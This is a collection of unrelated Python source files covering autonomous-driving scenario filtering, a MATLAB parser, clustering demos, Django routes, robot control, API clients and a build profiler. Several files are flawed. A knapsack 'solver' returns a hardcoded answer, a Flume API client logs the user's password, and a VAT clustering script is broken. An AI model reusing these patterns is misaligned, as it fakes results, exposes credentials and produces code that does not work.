NuPlanScenario(log_db, log_db.log_name, tag.lidar_pc_token, *args)
for log_db in log_dbs
for tag in log_db.scenario_tag.select_many(type=scenario_type)
if is_scene_valid(tag.lidar_pc.scene)
]
return scenario_dict
def create_all_scenarios(
db: NuPlanDBWrapper,
log_names: Optional[List[str]],
expand_scenarios: bool,
vehicle_parameters: VehicleParameters,
worker: WorkerPool,
ground_truth_predictions: Optional[TrajectorySampling],
) -> ScenarioDict:
"""
Create initial scenario dictionary containing all available scenarios in the scenario pool.
:param db: Object for accessing the available databases.
:param log_names: List of log names to include in the scenario dictionary.
:param expand_scenarios: Whether to expand multi-sample scenarios to multiple single-sample scenarios.
:param vehicle_parameters: Vehicle parameters for this db.
:param worker: Worker pool for concurrent scenario processing.
:param ground_truth_predictions: If None, no GT predictions will be extracted based on its future setting
:return: Dictionary that holds a list of scenarios for each scenario type.
"""
logger.debug('Creating all scenarios...')
# Whether to expand scenarios from multi-sample to single-sample scenarios
extraction_info = None if expand_scenarios else ScenarioExtractionInfo()
def get_scenarios_from_log_dbs(log_dbs: List[NuPlanDB]) -> List[NuPlanScenario]:
"""
Retrieve a list of nuplan scenario objects from a list of nuplan log databases.
:param log_db: List of nuplan log databases.
:return: List of nuplan scenarios.
"""
def get_scenarios_from_log_db(log_db: NuPlanDB) -> List[NuPlanScenario]:
"""
Retrieve a list of nuplan scenario objects from a single nuplan log database.
Note: This method uses variables from the outer scope to avoid transferring unnecessary load across workers.
:param log_db: Nuplan log database.
:return: List of nuplan scenarios.
"""
# Total list of scene tokens in the database
scene_tokens = [scene.token for scene in extract_scenes_from_log_db(log_db)]
query = (
log_db.session.query(LidarPc.token)
.filter(LidarPc.scene_token.in_(scene_tokens))
.order_by(LidarPc.timestamp.asc())
.all()
)
# Construct nuplan scenario objects for this log
args = [DEFAULT_SCENARIO_NAME, extraction_info, vehicle_parameters, ground_truth_predictions]
scenarios = [NuPlanScenario(log_db, log_db.log_name, token, *args) for token, in query]
return scenarios
return [scenario for log_db in log_dbs for scenario in get_scenarios_from_log_db(log_db)]
# Find all log dbs that match the desired log names
log_dbs = db.log_dbs
if log_names:
candidate_log_names = set(log_names)
log_dbs = [log_db for log_db in log_dbs if log_db.name in candidate_log_names]
# Retrieve all scenarios for the total list of scenes concurrently
scenarios = worker_map(worker, get_scenarios_from_log_dbs, log_dbs)
return {DEFAULT_SCENARIO_NAME: scenarios}
def filter_by_log_names(scenario_dict: ScenarioDict, log_names: List[str]) -> ScenarioDict:
"""
Filter a scenario dictionary by log names.
:param scenario_dict: Dictionary that holds a list of scenarios for each scenario type.
:param log_names: List of log names to include in the scenario dictionary.
:return: Filtered scenario dictionary.
"""
scenario_dict = {
scenario_type: [scenario for scenario in scenarios if scenario.log_name in log_names]
for scenario_type, scenarios in scenario_dict.items()
}
return scenario_dict
def filter_by_map_names(scenario_dict: ScenarioDict, map_names: List[str], db: NuPlanDBWrapper) -> ScenarioDict:
"""
Filter a scenario dictionary by map names.
:param scenario_dict: Dictionary that holds a list of scenarios for each scenario type.
:param map_names: List of map names to include in the scenario dictionary.
:param db: Object for accessing the available log databases.
:return: Filtered scenario dictionary.
"""
# Mapping from log name to map version
# TODO: Pass map name in scenario
log_maps = {log_db.log_name: log_db.map_name for log_db in db.log_dbs}
scenario_dict = {
scenario_type: [scenario for scenario in scenarios if log_maps[scenario.log_name] in map_names]
for scenario_type, scenarios in scenario_dict.items()
}
return scenario_dict
def filter_num_scenarios_per_type(
scenario_dict: ScenarioDict, num_scenarios_per_type: int, randomize: bool
) -> ScenarioDict:
"""
Filter the number of scenarios in a scenario dictionary per scenario type.
:param scenario_dict: Dictionary that holds a list of scenarios for each scenario type.
:param num_scenarios_per_type: Number of scenarios per type to keep.
:param randomize: Whether to randomly sample the scenarios.
:return: Filtered scenario dictionary.
"""
for scenario_type in scenario_dict:
if randomize and num_scenarios_per_type < len(scenario_dict[scenario_type]): # Sample scenarios randomly
scenario_dict[scenario_type] = random.sample(scenario_dict[scenario_type], num_scenarios_per_type)
else: # Sample the top k number of scenarios per type
scenario_dict[scenario_type] = scenario_dict[scenario_type][:num_scenarios_per_type]
return scenario_dict
def filter_total_num_scenarios(
scenario_dict: ScenarioDict, limit_total_scenarios: Union[int, float], randomize: bool
) -> ScenarioDict:
"""
Filter the total number of scenarios in a scenario dictionary.
:param scenario_dict: Dictionary that holds a list of scenarios for each scenario type.
:param limit_total_scenarios: Number of total scenarios to keep.
:param randomize: Whether to randomly sample the scenarios.
:return: Filtered scenario dictionary.
"""
scenario_list = scenario_dict_to_list(scenario_dict)
if isinstance(limit_total_scenarios, int): # Exact number of scenarios to keep
max_scenarios = limit_total_scenarios
scenario_list = (
random.sample(scenario_list, max_scenarios)
if randomize and max_scenarios < len(scenario_list)
else scenario_list[:max_scenarios]
)
elif isinstance(limit_total_scenarios, float): # Percentage of scenarios to keep
sample_ratio = limit_total_scenarios
assert 0.0 < sample_ratio < 1.0, f'Sample ratio has to be between 0 and 1, got {sample_ratio}'
step = int(1.0 / sample_ratio)
if step < len(scenario_list):
scenario_list = scenario_list[::step]
else:
raise TypeError('Scenario filter "limit_total_scenarios" must be of type int or float')
return scenario_list_to_dict(scenario_list)
def filter_invalid_goals(scenario_dict: ScenarioDict, worker: WorkerPool) -> ScenarioDict:
"""
Filter the scenarios with invalid mission goals in a scenario dictionary.
:param scenario_dict: Dictionary that holds a list of scenarios for each scenario type.
:param worker: Worker pool for concurrent scenario processing.
:return: Filtered scenario dictionary.
"""
def _filter_goals(scenarios: List[NuPlanScenario]) -> List[NuPlanScenario]:
"""
Filter scenarios that contain invalid mission goals.
:param scenarios: List of scenarios to filter.
:return: List of filtered scenarios.
"""
return [scenario for scenario in scenarios if scenario.get_mission_goal()]
for scenario_type in scenario_dict:
scenario_dict[scenario_type] = worker_map(worker, _filter_goals, scenario_dict[scenario_type])
return scenario_dict
def scenario_dict_to_list(scenario_dict: ScenarioDict, shuffle: Optional[bool] = None) -> List[NuPlanScenario]:
"""
Unravel a scenario dictionary to a list of scenarios.
:param scenario_dict: Dictionary that holds a list of scenarios for each scenario type.
:param shuffle: Whether to shuffle the scenario list.
:return: List of scenarios.
"""
scenarios = [scenario for scenario_list in scenario_dict.values() for scenario in scenario_list]
scenarios = sorted(scenarios, key=lambda scenario: scenario.token) # type: ignore
if shuffle:
random.shuffle(scenarios)
return scenarios
def scenario_list_to_dict(scenario_list: List[NuPlanScenario]) -> ScenarioDict:
"""
Convert a list of scenarios to a dictionary.
:param scenario_list: List of input scenarios.
:return: Dictionary that holds a list of scenarios for each scenario type.
"""
scenario_dict: ScenarioDict = defaultdict(list)
for scenario in scenario_list:
scenario_dict[scenario.scenario_type].append(scenario)
return scenario_dict
| python |
from antlr4 import InputStream, CommonTokenStream, ParseTreeWalker
from parse.MATLABLexer import MATLABLexer
from parse.MATLABParser import MATLABParser
from TranslateListener import TranslateListener
from error.ErrorListener import ParseErrorExceptionListener
from error.Errors import ParseError
def parse(in_str):
if in_str is None:
in_str = "function y = foo(x)\n"
chars = InputStream.InputStream(in_str)
lexer = MATLABLexer(chars)
tokens = CommonTokenStream(lexer)
parser = MATLABParser(tokens)
try:
# Remove existing console error listener
# NB: as of 20150708 pip install of antlr4 needs Recognizer.py to be patched
# to add the removeErrorListener methods
parser.removeErrorListeners()
except:
pass
# Throw if parse fails
parser.addErrorListener(ParseErrorExceptionListener.INSTANCE)
errorDispatch = parser.getErrorListenerDispatch()
tree = parser.fileDecl()
return tree
def translate(tree=None, string=None):
if tree == None:
tree = parse(string)
# Actually do the walking
evaluator = TranslateListener();
walker = ParseTreeWalker();
walker.walk(evaluator, tree);
if __name__ == '__main__':
import sys
if len(sys.argv) > 1:
with open(sys.argv[1], 'r') as f:
in_str = f.read()
else:
in_str = None
translate(string= in_str)
| python |
import cv2
import numpy as np
from matplotlib import cm
from matplotlib import pyplot as plt
from CS_data_generate import cs_data_generate
from deciVAT import deciVAT
from decVAT import decVAT
from dunns_index import dunns_index
from inciVat import inciVAT
from incVat import incVAT
def length(mat):
return np.max(mat.shape)
num_clusters = 3
num_points = 100
DI = 0
data_matrix_with_labels = 0
while DI < 1:
odds_matrix = np.ceil(
num_clusters * np.random.rand(1, num_clusters)).astype(int)
data_matrix_with_labels, dist_matrix = cs_data_generate(
number_of_clusters=num_clusters, odds_matrix=odds_matrix, total_no_of_points=num_points)
DI = dunns_index(num_clusters, dist_matrix, data_matrix_with_labels[:, 2])
colors_1 = np.array(cm.get_cmap().colors)
colors = np.zeros((num_clusters, 3))
for i in range(1, num_clusters+1):
colors[i-1, :] = colors_1[int(
np.ceil(max(colors_1.shape)*i/num_clusters)-1), :]
p1 = plt.figure(1)
for i in range(1, num_clusters+1):
cluster_index = np.array(np.where(data_matrix_with_labels[:, -1] == i))
plt.plot(data_matrix_with_labels[cluster_index, 0],
data_matrix_with_labels[cluster_index, 1], marker='o', color=colors[i-1, :], markersize=1)
# Add cv2 support
[N, M] = dist_matrix.shape
I = np.array([1, 2])
RV = dist_matrix[1:2, 1:2]
RiV = RV
d = dist_matrix[0, 1]
C = np.array([1, 1])
RI = np.array([1, 2])
RiV_index = [[0, 2], [2, 0]]
p2 = plt.figure(2)
for j in range(num_clusters):
cluster_index = np.where(data_matrix_with_labels(np.sort(I), 2) == j)
plt.plot(data_matrix_with_labels[cluster_index, 0],
data_matrix_with_labels[cluster_index, 1], marker='o', color=colors[i-1, :], markersize=1)
p3 = plt.figure(3)
plt.rcParams["figure.autolayout"] = True
plt.imshow(RiV, cmap=cm.get_cmap('gray'), extent=[-1, 1, -1, 1])
for i in range(3, N):
distance_previous_points = dist_matrix[i, I]
[RV, C, I, RI, d, new_point_location] = incVAT(
RV, C, I, RI, d, distance_previous_points)
RiV = inciVAT(RV, RiV, new_point_location)
p4 = plt.figure(4)
for j in range(num_clusters):
cluster_index = np.where(data_matrix_with_labels(np.sort(I), 2) == j)
plt.plot(data_matrix_with_labels[cluster_index, 0],
data_matrix_with_labels[cluster_index, 1], marker='o', color=colors[i-1, :], markersize=1)
p5 = plt.figure(5)
plt.rcParams["figure.autolayout"] = True
plt.imshow(RiV, cmap=cm.get_cmap('gray'), extent=[-1, 1, -1, 1])
while np.max(I.shape) > 3:
point_to_remove = I(np.random.rand(length(I), length(I)))
iVAT_point_to_remove_index = np.where(I == point_to_remove)
data_matrix_with_labels[iVAT_point_to_remove_index, :] = np.empty()
RV, C, I, RI, d = decVAT(RV, C, I, RI, d, point_to_remove)
RiV = deciVAT(RV, RiV, iVAT_point_to_remove_index)
p6 = plt.figure(6)
for j in range(num_clusters):
cluster_index = np.where(data_matrix_with_labels(np.sort(I), 2) == j)
plt.plot(data_matrix_with_labels[cluster_index, 0],
data_matrix_with_labels[cluster_index, 1], marker='o', color=colors[i-1, :], markersize=1)
p7 = plt.figure(7)
plt.rcParams["figure.autolayout"] = True
plt.imshow(RiV, cmap=cm.get_cmap('gray'), extent=[-1, 1, -1, 1])
| python |
from django.urls import path
from . import views
urlpatterns = [
path('iniciar-jogo/', views.JogoAPIView.as_view()),
path('finalizar-jogo/<int:id>', views.JogoAPIView.as_view()),
path('buscar-jogo/<int:id>', views.JogoAPIView.as_view()),
] | python |
import numpy
import os
import sys
def testing(l1, l2):
outputData = str(19) + ' ' + str(0) + '\n'
taken = [0, 0, 1, 1]
outputData += ' '.join(map(str, taken))
return outputData
def solveIt(inputData):
lines = inputData.split('\n')
l1, l2 = map(list, zip(*(s.split(" ") for s in lines)))
return testing(l1, l2)
if(len(sys.argv) == 2):
filename = sys.argv[1]
else:
sys.exit("Error: No input file provided. Please enter the path\\filename of the input file as an argument.")
f = open(filename, "r")
print(solveIt(f.read()))
f.close()
| python |
"""
CAR CONFIG
This file is read by your car application's manage.py script to change the car
performance.
EXMAPLE
-----------
import dk
cfg = dk.load_config(config_path='~/d2/config.py')
print(cfg.CAMERA_RESOLUTION)
"""
import os
#PATHS
CAR_PATH = PACKAGE_PATH = os.path.dirname(os.path.realpath(__file__))
DATA_PATH = os.path.join(CAR_PATH, 'data')
MODELS_PATH = os.path.join(CAR_PATH, 'models')
#VEHICLE
DRIVE_LOOP_HZ = 20
MAX_LOOPS = None
#CAMERA
CAMERA_RESOLUTION = (160, 120)
CAMERA_FRAMERATE = DRIVE_LOOP_HZ
#STEERING
STEERING_CHANNEL = 1
STEERING_LEFT_PWM = 460
STEERING_RIGHT_PWM = 290
#THROTTLE
THROTTLE_CHANNEL = 0
THROTTLE_FORWARD_PWM = 500
THROTTLE_STOPPED_PWM = 370
THROTTLE_REVERSE_PWM = 220
#TRAINING
BATCH_SIZE = 128
TRAIN_TEST_SPLIT = 0.8
#JOYSTICK
JOYSTICK_MAX_THROTTLE=1
JOYSTICK_STEERING_SCALE=1
USE_JOYSTICK_AS_DEFAULT = False
AUTO_RECORD_ON_THROTTLE = True
#ROTARY ENCODER
ROTARY_ENCODER_MM_PER_TICK=0.306096
ROTARY_ENCODER_PIN=27
MAX_VELOCITY=7.0
#THROTTLE PID
THROTTLE_PID_P=1.0
THROTTLE_PID_D=0.2
THROTTLE_PID_I=0.1
| python |
import wpilib.command
from wpilib import Timer
from data_logger import DataLogger
from profiler import TrapezoidalProfile
from pidcontroller import PIDController
from drivecontroller import DriveController
class ProfiledForward(wpilib.command.Command):
def __init__(self, distance_ft):
super().__init__("ProfiledForward")
self.drivetrain = self.getRobot().drivetrain
self.requires(self.drivetrain)
self.dist_ft = distance_ft
self.dist_enc = distance_ft * self.drivetrain.ratio
self.timer = Timer()
self.period = self.getRobot().getPeriod()
self.ctrl_heading = PIDController(
Kp=0, Ki=0, Kd=0, Kf=0,
source=self.drivetrain.getAngle,
output=self.correct_heading,
period=self.period,
)
self.ctrl_heading.setInputRange(-180, 180)
self.ctrl_heading.setOutputRange(-0.5, 0.5)
self.max_velocity_fps = 3 # ft/sec
self.max_v_encps = self.drivetrain.fps_to_encp100ms(self.max_velocity_fps)
self.max_acceleration = 3 # ft/sec^2
self.profiler_l = TrapezoidalProfile(
cruise_v=self.max_velocity_fps,
a=self.max_acceleration,
target_pos=self.dist_ft,
tolerance=(3/12.), # 3 inches
)
self.profiler_r = TrapezoidalProfile(
cruise_v=self.max_velocity_fps,
a=self.max_acceleration,
target_pos=-self.dist_ft,
tolerance=(3/12.), # 3 inches
)
self.ctrl_l = DriveController(
Kp=0, Kd=0,
Ks=1.293985, Kv=0.014172, Ka=0.005938,
get_voltage=self.drivetrain.getVoltage,
source=self.drivetrain.getLeftEncoderVelocity,
output=self.drivetrain.setLeftMotor,
period=self.period,
)
self.ctrl_l.setInputRange(-self.max_v_encps, self.max_v_encps)
self.ctrl_r = DriveController(
Kp=0, Kd=0,
Ks=1.320812, Kv=0.013736, Ka=0.005938,
get_voltage=self.drivetrain.getVoltage,
source=self.drivetrain.getRightEncoderVelocity,
output=self.drivetrain.setRightMotor,
period=self.period,
)
self.ctrl_r.setInputRange(-self.max_v_encps, self.max_v_encps)
self.target_v_l = 0
self.target_v_r = 0
self.target_a_l = 0
self.target_a_r = 0
self.pos_ft_l = 0
self.pos_ft_r = 0
def initialize(self):
self.drivetrain.zeroEncoders()
self.drivetrain.zeroNavx()
self.ctrl_l.enable()
self.ctrl_r.enable()
self.ctrl_heading.enable()
self.logger = DataLogger("profiled_forward.csv")
self.drivetrain.init_logger(self.logger)
self.logger.add("profile_vel_r", lambda: self.target_v_r)
self.logger.add("profile_vel_l", lambda: self.target_v_l)
self.logger.add("pos_ft_l", lambda: self.pos_ft_l)
self.logger.add("target_pos_l", lambda: self.profiler_l.target_pos)
self.logger.add("adist_l", lambda: self.profiler_l.adist)
self.logger.add("err_l", lambda: self.profiler_l.err)
self.logger.add("choice_l", lambda: self.profiler_l.choice)
self.logger.add("adist_r", lambda: self.profiler_l.adist)
self.logger.add("err_r", lambda: self.profiler_l.err)
self.logger.add("choice_r", lambda: self.profiler_l.choice)
self.timer.start()
#print ('pdf init')
def execute(self):
self.pos_ft_l = self.drivetrain.getLeftEncoder() / self.drivetrain.ratio
self.pos_ft_r = self.drivetrain.getRightEncoder() / self.drivetrain.ratio
#print ('pdf exec ', self.timer.get())
self.profiler_l.calculate_new_velocity(self.pos_ft_l, self.period )
self.profiler_r.calculate_new_velocity(self.pos_ft_r, self.period )
self.target_v_l = self.drivetrain.fps_to_encp100ms(self.profiler_l.current_target_v)
self.target_v_r = self.drivetrain.fps_to_encp100ms(self.profiler_r.current_target_v)
self.target_a_l = self.drivetrain.fps2_to_encpsp100ms(self.profiler_l.current_a)
self.target_a_r = self.drivetrain.fps2_to_encpsp100ms(self.profiler_r.current_a)
self.ctrl_l.setSetpoint(self.target_v_l)
self.ctrl_l.setAccelerationSetpoint(self.target_a_l)
self.ctrl_r.setSetpoint(self.target_v_r)
self.ctrl_r.setAccelerationSetpoint(self.target_a_r)
#self.drivetrain.setLeftMotor(self.ctrl_l.calculateFeedForward())
#self.drivetrain.setRightMotor(self.ctrl_r.calculateFeedForward())
self.logger.log()
self.drivetrain.feed()
def isFinished(self):
return (
abs(self.pos_ft_l - self.dist_ft) < 1/.3 and
self.profiler_l.current_target_v == 0 and
self.profiler_l.current_a == 0 and
self.profiler_r.current_target_v == 0 and
self.profiler_r.current_a == 0)
def end(self):
self.ctrl_l.disable()
self.ctrl_r.disable()
self.ctrl_heading.disable()
self.drivetrain.off()
self.logger.flush()
#print ('pdf end')
def correct_heading(self, correction):
self.profiler_l.setCruiseVelocityScale(1+correction)
self.profiler_r.setCruiseVelocityScale(1-correction)
| python |
from typing import Any, Dict
__all__ = (
"UserPublicMetrics",
"TweetPublicMetrics",
)
class UserPublicMetrics:
"""Represent a PublicMetrics for a User.
This PublicMetrics contain public info about the user.
.. versionadded:: 1.1.0
"""
def __init__(self, data: Dict[str, Any] = {}):
self.original_payload: Dict[str, Any] = data
self._public: Dict[Any, Any] = self.original_payload.get("public_metrics")
def __repr__(self) -> str:
return f"UserPublicMetrics(user={self.original_payload.get('username')} follower_count={self.follower_count} following_count={self.following_count} tweet_count={self.tweet_count})"
@property
def follower_count(self) -> int:
""":class:`int`: Returns total of followers that a user has.
.. versionadded:: 1.1.0
"""
return int(self._public.get("followers_count"))
@property
def following_count(self) -> int:
""":class:`int`: Returns total of following that a user has.
.. versionadded:: 1.1.0
"""
return int(self._public.get("following_count"))
@property
def tweet_count(self) -> int:
""":class:`int`: Returns total of tweet that a user has.
.. versionadded:: 1.1.0
"""
return int(self._public.get("tweet_count"))
@property
def listed_count(self) -> int:
""":class:`int`: Returns total of listed that a user has.
.. versionadded:: 1.1.0
"""
return int(self._public.get("listed_count"))
class TweetPublicMetrics:
"""Represent a PublicMetrics for a tweet.
This PublicMetrics contain public info about the tweet.
.. versionadded:: 1.1.0
"""
def __init__(self, data: Dict[str, Any] = {}) -> None:
self.original_payload = data
self._public = data.get("public_metrics")
def __repr__(self) -> str:
return f"TweetPublicMetrics(like_count={self.like_count} retweet_count={self.retweet_count} reply_count={self.reply_count}> quote_count={self.quote_count})"
@property
def like_count(self) -> int:
""":class:`int`: Return total of likes that the tweet has.
.. versionadded:: 1.1.0
"""
return int(self._public.get("like_count"))
@property
def retweet_count(self) -> int:
""":class:`int`: Return total of retweetes that the tweet has.
.. versionadded:: 1.1.0
"""
return int(self._public.get("retweet_count"))
@property
def reply_count(self) -> int:
""":class:`int`: Return total of replies that the tweet has.
.. versionadded:: 1.1.0
"""
return int(self._public.get("reply_count"))
@property
def quote_count(self) -> int:
""":class:`int`: Return total of quotes that the tweet has.
.. versionadded:: 1.1.0
"""
return int(self._public.get("quote_count"))
| python |
"""The Labeled Faces in the Wild (LFW) dataset.
from dltb.thirdparty.datasource.lfw import LabeledFacesInTheWild
lfw = LabeledFacesInTheWild()
lfw.prepare()
lfw.sklearn is None
"""
# standard imports
import logging
import importlib
# toolbox imports
from dltb.datasource import DataDirectory
# logging
LOG = logging.getLogger(__name__)
class EnvironmentalSoundClassification(DataDirectory):
"""A :py:class:`Datasource` for accessing the
Dataset for Environmental Sound Classification [1], ECS-10 and ECS-50
[1] doi:10.7910/DVN/YDEPUT
"""
def __init__(self, key: str = None, esc_data: str = None,
**kwargs) -> None:
"""Initialize the Environmental Sound Classification (ESC) dataset.
Parameters
----------
esc_data: str
The path to the ESC root directory. This directory
should contain the (10 or 50) subdirectories holding
sound files for the respective classes.
"""
# directory = '/space/data/ESC/ESC-10' # FIXME[hack]
if esc_data is None:
esc_data = '/space/data/ESC/ESC-10'
description = "Environmental Sound Classification"
super().__init__(key=key or "esc",
directory=esc_data,
description=description,
label_from_directory='name',
**kwargs)
LOG.info("Initialized the Environmental Sound Classification "
"dataset (directory=%s)", self.directory)
def _prepare(self) -> None:
super()._prepare()
LOG.info("Prepared the Environmental Sound Classification "
"dataset (directory=%s)", self.directory)
| python |
import FWCore.ParameterSet.Config as cms
muonTrackProducer = cms.EDProducer("MuonTrackProducer",
muonsTag = cms.InputTag("muons"),
inputDTRecSegment4DCollection = cms.InputTag("dt4DSegments"),
inputCSCSegmentCollection = cms.InputTag("cscSegments"),
selectionTags = cms.vstring('TrackerMuonArbitrated'),
trackType = cms.string('innerTrackPlusSegments'),
ignoreMissingMuonCollection = cms.untracked.bool(False)
)
| python |
'''
This file
'''
import logging
import urllib.parse
import requests
import datetime
import argparse
import json
import jwt
import pytz
import time
import math
class API(object):
def __init__(self, clientid=None, clientsecret=None,username=None, password=None,timezone=None):
assert clientid is not None
assert clientsecret is not None
self.clientid = clientid
self.clientsecret = clientsecret
self.username = username
self.password = password
self.timezone = timezone
self.session = requests.Session()
def unparse(self, obj):
return obj
def parse(self, string):
return string
def buildRequestHeader(self):
header = {"Authorization": "Bearer " + self.access_token}
return header
def device_list(self):
devices = []
headers = {"Authorization": "Bearer " + self.access_token}
resp = requests.request('GET', 'https://api.flumetech.com/users/' + str(self.user_id) + '/devices', headers=headers)
dataJSON = json.loads(resp.text)
logging.debug("Executed device search")
if dataJSON["http_code"] == 200:
for bridge in dataJSON["data"]:
logging.debug("JSON Data from device")
logging.debug(dataJSON["data"])
if bridge["type"] == 2:
devices.append(bridge["id"])
logging.debug("Executed device search")
return devices
def device_query(self, device_id, all=False, refresh=False):
result = []
# remove timezone , need to make sure tomezone on FLUME is correct
if self.timezone :
now = datetime.datetime.now(pytz.timezone(self.timezone))
else :
now = datetime.datetime.now()
current_min= now.strftime('%Y-%m-%d %H:%M:00')
previous_min = (now - datetime.timedelta(minutes=1)).strftime('%Y-%m-%d %H:%M:00')
current_month = now.strftime('%Y-%m-01 00:00:00')
payload = '{"queries":[{"request_id":"perminute","bucket":"MIN","since_datetime":"' + previous_min + '","until_datetime":"' + current_min + '","group_multiplier":"1","operation":"SUM","sort_direction":"ASC","units":"GALLONS"}, {"request_id":"currentmonth","bucket":"MON","since_datetime":"' + current_month + '", "operation":"SUM"}]}'
logging.debug(payload)
headers = {"Authorization": "Bearer " + self.access_token}
headers["content-type"] = "application/json"
resp = requests.request("POST", "https://api.flumetech.com/users/" + str(self.user_id) + "/devices/" + str(device_id) + "/query", data=payload, headers=headers)
data = json.loads(resp.text)
logging.debug(data)
if data["http_code"]==200 :
result.append(data["data"][0]["perminute"][0]["value"])
result.append(data["data"][0]["currentmonth"][0]["value"])
return result
else:
return None
def credentials(self):
# get the credential
url = "https://api.flumetech.com/oauth/token"
payload = '{"grant_type":"password","client_id":"' + self.clientid + '","client_secret":"' + self.clientsecret + '","username":"' + self.username + '","password":"' + self.password + '"}'
headers = {'content-type': 'application/json'}
logging.debug("Post to server: " + payload)
resp = requests.request("POST", url, data=payload, headers=headers)
logging.debug("response from server: " + resp.text)
dataJSON = json.loads(resp.text)
if dataJSON["http_code"] == 200:
logging.debug("Got 200 response from auth token request")
self.access_token = dataJSON["data"][0]["access_token"]
self.refresh_token = dataJSON["data"][0]["refresh_token"]
else:
quit("Failed to get credential")
return
def userid(self):
decoded = jwt.decode(self.access_token, options={"verify_signature": False})
self.user_id = decoded["user_id"]
logging.debug(decoded)
return
| python |
"""URLS for accounts"""
from django.urls import path
import django.contrib.auth.views
from . import views
# pylint: disable=invalid-name
app_name = 'accounts'
urlpatterns = [
path('login/', views.SocialLoginView.as_view(), name='login'),
path('login/native/', views.NativeLoginView.as_view(), name='login-native'),
path('logout/', django.contrib.auth.views.LogoutView.as_view(), name='logout')
]
| python |
# Copyright (c) Techland. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
"""Contains the Analyser class, used to run analysis on the dependency graph."""
import logging
import os
from collections import defaultdict
import networkx as nx
from cppbuildprofiler.dependency import DependencyGraph
def _pretty_filesize(size):
reduced_size = float(size)
prefixes = ['', 'K', 'M', 'G']
prefix_idx = 0
while reduced_size >= 1000.0:
reduced_size *= 0.001
prefix_idx += 1
assert(prefix_idx < len(prefixes)), 'Size is absurd: %s' % size
return '%0.2f%sB' % (reduced_size, prefixes[prefix_idx])
class Analyser:
"""Performs an optimisation-related analysis on a dependency graph."""
class Attributes: # pylint: disable=too-few-public-methods
"""Contains names of depgraph attributes with analyser metrics"""
PROJECT = 'project'
ABSOLUTE_PATH = 'absolutepath'
COMPILATION_COMMAND = 'compilationcommand'
USED_PCH = 'usepch'
CREATED_PCH = 'createpch'
BUILD_TIME = 'buildtime'
FILE_SIZE = 'filesize'
TOTAL_SIZE = 'totalsize'
AGG_BUILD_TIME_DEV = 'avgbuildtimedev'
TRANSLATION_UNITS = 'translationunits'
def __init__(self):
pass
UNKNOWN_PROJECT_NAME = '__UNKNOWN__'
ROOT_COLUMNS = {
Attributes.BUILD_TIME: DependencyGraph.Column('total build time [s]', 0.0),
Attributes.TRANSLATION_UNITS: DependencyGraph.Column('total translation units', 0),
Attributes.TOTAL_SIZE: DependencyGraph.Column('total size [B]', 0),
}
TOP_LEVEL_COLUMNS = {
Attributes.PROJECT: DependencyGraph.Column('project', ''),
Attributes.ABSOLUTE_PATH: DependencyGraph.Column('absolute path', None),
Attributes.BUILD_TIME: DependencyGraph.Column('build time [s]', 0.0),
Attributes.FILE_SIZE: DependencyGraph.Column('file size [B]', 0),
Attributes.TOTAL_SIZE: DependencyGraph.Column('total size [B]', 0),
}
INTERNAL_COLUMNS = {
Attributes.PROJECT: DependencyGraph.Column('project', ''),
Attributes.ABSOLUTE_PATH: DependencyGraph.Column('absolute path', None),
Attributes.TRANSLATION_UNITS: DependencyGraph.Column(
'number of dependent translation units', 0),
Attributes.FILE_SIZE: DependencyGraph.Column('file size [B]', 0),
Attributes.TOTAL_SIZE: DependencyGraph.Column('aggregated total size [B]', 0),
Attributes.BUILD_TIME: DependencyGraph.Column(
'total build time of dependants [s]', 0.0),
Attributes.AGG_BUILD_TIME_DEV: DependencyGraph.Column(
'aggregated build time deviation from avg [s]', 0.0),
}
def __init__(self, dependency_graph):
self._dependency_graph = dependency_graph
self._build_pch_dependencies()
def _build_pch_dependencies(self):
self._pch_dependencies = {}
for cpp_node in self._dependency_graph.get_top_level_nodes():
create_pch = self._dependency_graph.get_attribute(cpp_node, self.Attributes.CREATED_PCH)
if create_pch:
if create_pch in self._pch_dependencies:
raise RuntimeError('Duplicate precompiled header name: %s' %
create_pch)
self._pch_dependencies[create_pch] = frozenset(
self._dependency_graph.traverse_pre_order(create_pch, True))
def _is_pch_dependency(self, parent, child):
use_pch = self._dependency_graph.get_attribute(parent, self.Attributes.USED_PCH)
if use_pch:
return child in self._pch_dependencies[use_pch]
else:
return False
def _guess_dependency_project(self, label, directory_to_project):
if self._dependency_graph.has_attribute(label, self.Attributes.PROJECT):
return self._dependency_graph.get_attribute(label, self.Attributes.PROJECT)
directory = os.path.dirname(
self._dependency_graph.get_attribute(label, self.Attributes.ABSOLUTE_PATH))
while directory not in directory_to_project:
parent = os.path.dirname(directory)
if parent == directory:
return self.UNKNOWN_PROJECT_NAME
else:
directory = parent
return directory_to_project[directory]
def get_project_dependency_graph(self):
"""
Builds a dependency graph showing relations between projects. This is
a networkx DiGraph, not a DependencyGraph.
"""
graph = nx.DiGraph()
for node in self._dependency_graph.traverse_pre_order():
dependencies = self._dependency_graph.get_node_immediate_dependencies(node)
source = self._dependency_graph.get_attribute(node, self.Attributes.PROJECT)
for dependency_node in dependencies:
target = self._dependency_graph.get_attribute(dependency_node,
self.Attributes.PROJECT)
if source != target:
graph.add_edge(source, target)
return graph
def calculate_file_sizes(self):
"""
Calculates file sizes of individual files by checking the disk
usage for files pointed to by Metrics.ABSOLUTE_PATH in the DependencyGraph.
"""
logging.info('Calculating file sizes...')
for label in self._dependency_graph.traverse_post_order():
path = self._dependency_graph.get_attribute(label,
self.Attributes.ABSOLUTE_PATH)
file_size = os.path.getsize(path)
self._dependency_graph.set_attribute(label, self.Attributes.FILE_SIZE,
file_size)
logging.debug('File size of %s is %s',
label, _pretty_filesize(file_size))
def calculate_total_sizes(self):
"""
Calculates "total" sizes of files. This is the file size of the node
plus the sizes of all its dependencies. For top level nodes (.cpp files)
we're calculating the total size in a straightforward manner. For internal
nodes we're getting the aggregated subtree total size by summing total
sizes when included from each of the top level nodes. This is done
because the subtree size may be significantly smaller if included from
a file using a precompiled header with one of the subtree nodes.
"""
logging.info('Calculating total sizes...')
for label in self._dependency_graph.traverse_pre_order(include_origin=True):
self._dependency_graph.remove_attribute(label, self.Attributes.TOTAL_SIZE)
top_level_total_size = 0
for top_level in self._dependency_graph.get_top_level_nodes():
subtree_sizes = defaultdict(lambda: 0)
subtree = self._dependency_graph.get_subtree(top_level)
for internal in subtree.traverse_post_order(top_level, True):
if not self._is_pch_dependency(top_level, internal):
subtree_size = self._dependency_graph.get_attribute(internal,
self.Attributes.FILE_SIZE)
for child in subtree.get_node_immediate_dependencies(internal):
subtree_size += subtree_sizes[child]
subtree_sizes[internal] += subtree_size
